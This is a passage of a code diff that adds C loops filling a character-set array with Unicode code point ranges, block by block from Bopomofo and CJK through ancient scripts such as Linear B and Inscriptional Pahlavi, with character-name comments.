+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+// 10000..1007F; Linear B Syllabary
+	c = 0x10000;		// from LINEAR B SYLLABLE B008 A
+	while (c <= 0x1000b)	// ..to LINEAR B SYLLABLE B046 JE
+		charset[i++] = c++;
+	c = 0x1000d;		// from LINEAR B SYLLABLE B036 JO
+	while (c <= 0x10026)	// ..to LINEAR B SYLLABLE B032 QO
+		charset[i++] = c++;
+	c = 0x10028;		// from LINEAR B SYLLABLE B060 RA
+	while (c <= 0x1003a)	// ..to LINEAR B SYLLABLE B042 WO
+		charset[i++] = c++;
+	charset[i++] = 0x1003c;	// LINEAR B SYLLABLE B017 ZA
+	charset[i++] = 0x1003d;	// LINEAR B SYLLABLE B074 ZE
+	c = 0x1003f;		// from LINEAR B SYLLABLE B020 ZO
+	while (c <= 0x1004d)	// ..to LINEAR B SYLLABLE B091 TWO
+		charset[i++] = c++;
+	c = 0x10050;		// from LINEAR B SYMBOL B018
+	while (c <= 0x1005d)	// ..to LINEAR B SYMBOL B089
+		charset[i++] = c++;
+// 10080..100FF; Linear B Ideograms
+	c = 0x10080;		// from LINEAR B IDEOGRAM B100 MAN
+	while (c <= 0x100fa)	// ..to LINEAR B IDEOGRAM VESSEL B305
+		charset[i++] = c++;
+// 10100..1013F; Aegean Numbers
+	charset[i++] = 0x10100;	// AEGEAN WORD SEPARATOR LINE
+	charset[i++] = 0x10102;	// AEGEAN CHECK MARK
+	c = 0x10107;		// from AEGEAN NUMBER ONE
+	while (c <= 0x10133)	// ..to AEGEAN NUMBER NINETY THOUSAND
+		charset[i++] = c++;
+	c = 0x10137;		// from AEGEAN WEIGHT BASE UNIT
+	while (c <= 0x1013f)	// ..to AEGEAN MEASURE THIRD SUBUNIT
+		charset[i++] = c++;
+// 10140..1018F; Ancient Greek Numbers
+	c = 0x10140;		// from GREEK ACROPHONIC ATTIC ONE QUARTER
+	while (c <= 0x1018e)	// ..to NOMISMA SIGN
+		charset[i++] = c++;
+// 10190..101CF; Ancient Symbols
+	c = 0x10190;		// from ROMAN SEXTANS SIGN
+	while (c <= 0x1019b)	// ..to ROMAN CENTURIAL SIGN
+		charset[i++] = c++;
+	charset[i++] = 0x101a0;	// GREEK SYMBOL TAU RHO
+// 101D0..101FF; Phaistos Disc
+	c = 0x101d0;		// from PHAISTOS DISC SIGN PEDESTRIAN
+	while (c <= 0x101fd)	// ..to PHAISTOS DISC SIGN COMBINING OBLIQUE STROKE
+		charset[i++] = c++;
+// 10280..1029F; Lycian
+	c = 0x10280;		// from LYCIAN LETTER A
+	while (c <= 0x1029c)	// ..to LYCIAN LETTER X
+		charset[i++] = c++;
+// 102A0..102DF; Carian
+	c = 0x102a0;		// from CARIAN LETTER A
+	while (c <= 0x102d0)	// ..to CARIAN LETTER UUU3
+		charset[i++] = c++;
+// 102E0..102FF; Coptic Epact Numbers
+	c = 0x102e0;		// from COPTIC EPACT THOUSANDS MARK
+	while (c <= 0x102fb)	// ..to COPTIC EPACT NUMBER NINE HUNDRED
+		charset[i++] = c++;
+// 10300..1032F; Old Italic
+	c = 0x10300;		// from OLD ITALIC LETTER A
+	while (c <= 0x10323)	// ..to OLD ITALIC NUMERAL FIFTY
+		charset[i++] = c++;
+	charset[i++] = 0x1032d;	// OLD ITALIC LETTER YE
+	charset[i++] = 0x1032f;	// OLD ITALIC LETTER SOUTHERN TSE
+// 10330..1034F; Gothic
+	c = 0x10330;		// from GOTHIC LETTER AHSA
+	while (c <= 0x1034a)	// ..to GOTHIC LETTER NINE HUNDRED
+		charset[i++] = c++;
+// 10350..1037F; Old Permic
+	c = 0x10350;		// from OLD PERMIC LETTER AN
+	while (c <= 0x1037a)	// ..to COMBINING OLD PERMIC LETTER SII
+		charset[i++] = c++;
+// 10380..1039F; Ugaritic
+	c = 0x10380;		// from UGARITIC LETTER ALPA
+	while (c <= 0x1039d)	// ..to UGARITIC LETTER SSU
+		charset[i++] = c++;
+	charset[i++] = 0x1039f;	// UGARITIC WORD DIVIDER
+// 103A0..103DF; Old Persian
+	c = 0x103a0;		// from OLD PERSIAN SIGN A
+	while (c <= 0x103c3)	// ..to OLD PERSIAN SIGN HA
+		charset[i++] = c++;
+	c = 0x103c8;		// from OLD PERSIAN SIGN AURAMAZDAA
+	while (c <= 0x103d5)	// ..to OLD PERSIAN NUMBER HUNDRED
+		charset[i++] = c++;
+// 10400..1044F; Deseret
+	c = 0x10400;		// from DESERET CAPITAL LETTER LONG I
+	while (c <= 0x1044f)	// ..to DESERET SMALL LETTER EW
+		charset[i++] = c++;
+// 10450..1047F; Shavian
+	c = 0x10450;		// from SHAVIAN LETTER PEEP
+	while (c <= 0x1047f)	// ..to SHAVIAN LETTER YEW
+		charset[i++] = c++;
+// 10480..104AF; Osmanya
+	c = 0x10480;		// from OSMANYA LETTER ALEF
+	while (c <= 0x1049d)	// ..to OSMANYA LETTER OO
+		charset[i++] = c++;
+	c = 0x104a0;		// from OSMANYA DIGIT ZERO
+	while (c <= 0x104a9)	// ..to OSMANYA DIGIT NINE
+		charset[i++] = c++;
+// 104B0..104FF; Osage
+	c = 0x104b0;		// from OSAGE CAPITAL LETTER A
+	while (c <= 0x104d3)	// ..to OSAGE CAPITAL LETTER ZHA
+		charset[i++] = c++;
+	c = 0x104d8;		// from OSAGE SMALL LETTER A
+	while (c <= 0x104fb)	// ..to OSAGE SMALL LETTER ZHA
+		charset[i++] = c++;
+// 10500..1052F; Elbasan
+	c = 0x10500;		// from ELBASAN LETTER A
+	while (c <= 0x10527)	// ..to ELBASAN LETTER KHE
+		charset[i++] = c++;
+// 10530..1056F; Caucasian Albanian
+	c = 0x10530;		// from CAUCASIAN ALBANIAN LETTER ALT
+	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
+		charset[i++] = c++;
+	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10600..1077F; Linear A
+	c = 0x10600;		// from LINEAR A SIGN AB001
+	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
+		charset[i++] = c++;
+	c = 0x10740;		// from LINEAR A SIGN A701 A
+	while (c <= 0x10755)	// ..to LINEAR A SIGN A732 JE
+		charset[i++] = c++;
+	c = 0x10760;		// from LINEAR A SIGN A800
+	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
+		charset[i++] = c++;
+// 10800..1083F; Cypriot Syllabary
+	c = 0x10800;		// from CYPRIOT SYLLABLE A
+	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
+		charset[i++] = c++;
+	c = 0x1080a;		// from CYPRIOT SYLLABLE KA
+	while (c <= 0x10835)	// ..to CYPRIOT SYLLABLE WO
+		charset[i++] = c++;
+	charset[i++] = 0x10837;	// CYPRIOT SYLLABLE XA
+	charset[i++] = 0x10838;	// CYPRIOT SYLLABLE XE
+	c = 0x1083c;		// from CYPRIOT SYLLABLE ZA
+	while (c <= 0x1083f)	// ..to CYPRIOT SYLLABLE ZO
+		charset[i++] = c++;
+// 10840..1085F; Imperial Aramaic
+	c = 0x10840;		// from IMPERIAL ARAMAIC LETTER ALEPH
+	while (c <= 0x10855)	// ..to IMPERIAL ARAMAIC LETTER TAW
+		charset[i++] = c++;
+	c = 0x10857;		// from IMPERIAL ARAMAIC SECTION SIGN
+	while (c <= 0x1085f)	// ..to IMPERIAL ARAMAIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 10860..1087F; Palmyrene
+	c = 0x10860;		// from PALMYRENE LETTER ALEPH
+	while (c <= 0x1087f)	// ..to PALMYRENE NUMBER TWENTY
+		charset[i++] = c++;
+// 10880..108AF; Nabataean
+	c = 0x10880;		// from NABATAEAN LETTER FINAL ALEPH
+	while (c <= 0x1089e)	// ..to NABATAEAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x108a7;		// from NABATAEAN NUMBER ONE
+	while (c <= 0x108af)	// ..to NABATAEAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 108E0..108FF; Hatran
+	c = 0x108e0;		// from HATRAN LETTER ALEPH
+	while (c <= 0x108f2)	// ..to HATRAN LETTER QOPH
+		charset[i++] = c++;
+	charset[i++] = 0x108f4;	// HATRAN LETTER SHIN
+	charset[i++] = 0x108f5;	// HATRAN LETTER TAW
+	c = 0x108fb;		// from HATRAN NUMBER ONE
+	while (c <= 0x108ff)	// ..to HATRAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10900..1091F; Phoenician
+	c = 0x10900;		// from PHOENICIAN LETTER ALF
+	while (c <= 0x1091b)	// ..to PHOENICIAN NUMBER THREE
+		charset[i++] = c++;
+	charset[i++] = 0x1091f;	// PHOENICIAN WORD SEPARATOR
+// 10920..1093F; Lydian
+	c = 0x10920;		// from LYDIAN LETTER A
+	while (c <= 0x10939)	// ..to LYDIAN LETTER C
+		charset[i++] = c++;
+	charset[i++] = 0x1093f;	// LYDIAN TRIANGULAR MARK
+// 10980..1099F; Meroitic Hieroglyphs
+	c = 0x10980;		// from MEROITIC HIEROGLYPHIC LETTER A
+	while (c <= 0x1099f)	// ..to MEROITIC HIEROGLYPHIC SYMBOL VIDJ-2
+		charset[i++] = c++;
+// 109A0..109FF; Meroitic Cursive
+	c = 0x109a0;		// from MEROITIC CURSIVE LETTER A
+	while (c <= 0x109b7)	// ..to MEROITIC CURSIVE LETTER DA
+		charset[i++] = c++;
+	c = 0x109bc;		// from MEROITIC CURSIVE FRACTION ELEVEN TWELFTHS
+	while (c <= 0x109cf)	// ..to MEROITIC CURSIVE NUMBER SEVENTY
+		charset[i++] = c++;
+	c = 0x109d2;		// from MEROITIC CURSIVE NUMBER ONE HUNDRED
+	while (c <= 0x109ff)	// ..to MEROITIC CURSIVE FRACTION TEN TWELFTHS
+		charset[i++] = c++;
+// 10A00..10A5F; Kharoshthi
+	c = 0x10a00;		// from KHAROSHTHI LETTER A
+	while (c <= 0x10a03)	// ..to KHAROSHTHI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x10a05;	// KHAROSHTHI VOWEL SIGN E
+	charset[i++] = 0x10a06;	// KHAROSHTHI VOWEL SIGN O
+	c = 0x10a0c;		// from KHAROSHTHI VOWEL LENGTH MARK
+	while (c <= 0x10a13)	// ..to KHAROSHTHI LETTER GHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a15;	// KHAROSHTHI LETTER CA
+	charset[i++] = 0x10a17;	// KHAROSHTHI LETTER JA
+	c = 0x10a19;		// from KHAROSHTHI LETTER NYA
+	while (c <= 0x10a35)	// ..to KHAROSHTHI LETTER VHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a38;	// KHAROSHTHI SIGN BAR ABOVE
+	charset[i++] = 0x10a3a;	// KHAROSHTHI SIGN DOT BELOW
+	c = 0x10a3f;		// from KHAROSHTHI VIRAMA
+	while (c <= 0x10a48)	// ..to KHAROSHTHI FRACTION ONE HALF
+		charset[i++] = c++;
+	c = 0x10a50;		// from KHAROSHTHI PUNCTUATION DOT
+	while (c <= 0x10a58)	// ..to KHAROSHTHI PUNCTUATION LINES
+		charset[i++] = c++;
+// 10A60..10A7F; Old South Arabian
+	c = 0x10a60;		// from OLD SOUTH ARABIAN LETTER HE
+	while (c <= 0x10a7f)	// ..to OLD SOUTH ARABIAN NUMERIC INDICATOR
+		charset[i++] = c++;
+// 10A80..10A9F; Old North Arabian
+	c = 0x10a80;		// from OLD NORTH ARABIAN LETTER HEH
+	while (c <= 0x10a9f)	// ..to OLD NORTH ARABIAN NUMBER TWENTY
+		charset[i++] = c++;
+// 10AC0..10AFF; Manichaean
+	c = 0x10ac0;		// from MANICHAEAN LETTER ALEPH
+	while (c <= 0x10ae6)	// ..to MANICHAEAN ABBREVIATION MARK BELOW
+		charset[i++] = c++;
+	c = 0x10aeb;		// from MANICHAEAN NUMBER ONE
+	while (c <= 0x10af6)	// ..to MANICHAEAN PUNCTUATION LINE FILLER
+		charset[i++] = c++;
+// 10B00..10B3F; Avestan
+	c = 0x10b00;		// from AVESTAN LETTER A
+	while (c <= 0x10b35)	// ..to AVESTAN LETTER HE
+		charset[i++] = c++;
+	c = 0x10b39;		// from AVESTAN ABBREVIATION MARK
+	while (c <= 0x10b3f)	// ..to LARGE ONE RING OVER TWO RINGS PUNCTUATION
+		charset[i++] = c++;
+// 10B40..10B5F; Inscriptional Parthian
+	c = 0x10b40;		// from INSCRIPTIONAL PARTHIAN LETTER ALEPH
+	while (c <= 0x10b55)	// ..to INSCRIPTIONAL PARTHIAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b58;		// from INSCRIPTIONAL PARTHIAN NUMBER ONE
+	while (c <= 0x10b5f)	// ..to INSCRIPTIONAL PARTHIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B60..10B7F; Inscriptional Pahlavi
+	c = 0x10b60;		// from INSCRIPTIONAL PAHLAVI LETTER ALEPH
+	while (c <= 0x10b72)	// ..to INSCRIPTIONAL PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b78;		// from INSCRIPTIONAL PAHLAVI NUMBER ONE
+	while (c <= 0x10b7f)	// ..to INSCRIPTIONAL PAHLAVI NUMBER ONE THOUSAND
+		charset[i++] = c++;
